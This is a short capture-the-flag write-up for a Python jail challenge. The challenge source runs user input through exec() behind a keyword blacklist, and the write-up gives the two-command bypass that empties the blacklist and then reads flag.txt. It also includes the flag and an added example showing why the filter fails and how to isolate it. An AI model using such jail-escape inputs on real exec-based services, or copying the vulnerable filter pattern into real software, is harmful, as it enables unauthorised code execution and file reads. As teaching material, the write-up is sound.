Tags: pyjail 

Connecting to the server shows the source code:

```py
#!/usr/bin/env python3
blacklist = ["/","0","1","2","3","4","5","6","7","8","9","setattr","compile","globals","os","import","_","breakpoint","exit","lambda","eval","exec","read","print","open","'","=",'"',"x","builtins","clear"]
print("="*25)
print(open(__file__).read())
print("="*25)
print("Welcome to the jail!")
print("="*25)

for i in range(2):
    x = input('Enter command: ')
    for c in blacklist:
        if c in x:
            print("Blacklisted word found! Exiting!")
            exit(0)
    exec(x)
```

When I first saw this I was intrigued by seeing that we are allowed 2 inputs per connection.
So logically I realised that the first input was to clear the blacklist, and the second to read the flag.
I did `del blacklist[:]` first which empties the blacklist. Then `print(open("flag.txt").read())` to read the flag.
Apparently my solution is more elegant than the intended `.pop()` solution: `[blacklist.pop() for i in range(len(blacklist))]` :)

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/f627280d-7767-4398-961e-003fd88b230c)

Flag: `n00bz{blacklist.pop()_ftw!_7a5d2f8b}`

Original writeup (https://jp-ch.gq/miscellaneous/n00bzCTF-2023.html#big-blacklist).
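
The root cause of the bypass above, shown as an added example that is not part of the original writeup or the challenge: the filter's state is a mutable list living in the same namespace that `exec()` runs in. The shortened `BLACKLIST`, the names `run_shared` and `run_isolated`, and the sample commands are constructed for illustration.

```python
import contextlib
import io

# Shortened, constructed stand-in for the challenge's blacklist.
BLACKLIST = ["print", "open", "'", '"', "=", "_", "import"]

# Constructed two-input session: the first input empties the list in place.
ATTEMPT = ["del blacklist[:]", 'print("filter bypassed")']


def run_shared(commands):
    """Challenge pattern: exec() shares the namespace that holds the mutable blacklist."""
    env = {"blacklist": list(BLACKLIST)}
    out = io.StringIO()
    for cmd in commands:
        if any(word in cmd for word in env["blacklist"]):
            return "blocked", out.getvalue()
        with contextlib.redirect_stdout(out):
            exec(cmd, env)  # user code can reach and mutate env["blacklist"]
    return "ran", out.getvalue()


def run_isolated(commands):
    """Filter state is an immutable tuple kept outside the exec() namespace.

    This closes only the bypass shown here; a substring blacklist in front of
    exec() is still not a sandbox.
    """
    blacklist = tuple(BLACKLIST)
    env = {}  # user code gets its own globals, with no reference to the filter
    out = io.StringIO()
    for cmd in commands:
        if any(word in cmd for word in blacklist):
            return "blocked", out.getvalue()
        try:
            with contextlib.redirect_stdout(out):
                exec(cmd, env)
        except Exception as exc:
            return f"error: {type(exc).__name__}", out.getvalue()
    return "ran", out.getvalue()


if __name__ == "__main__":
    print("shared namespace:  ", run_shared(ATTEMPT))
    print("isolated namespace:", run_isolated(ATTEMPT))
```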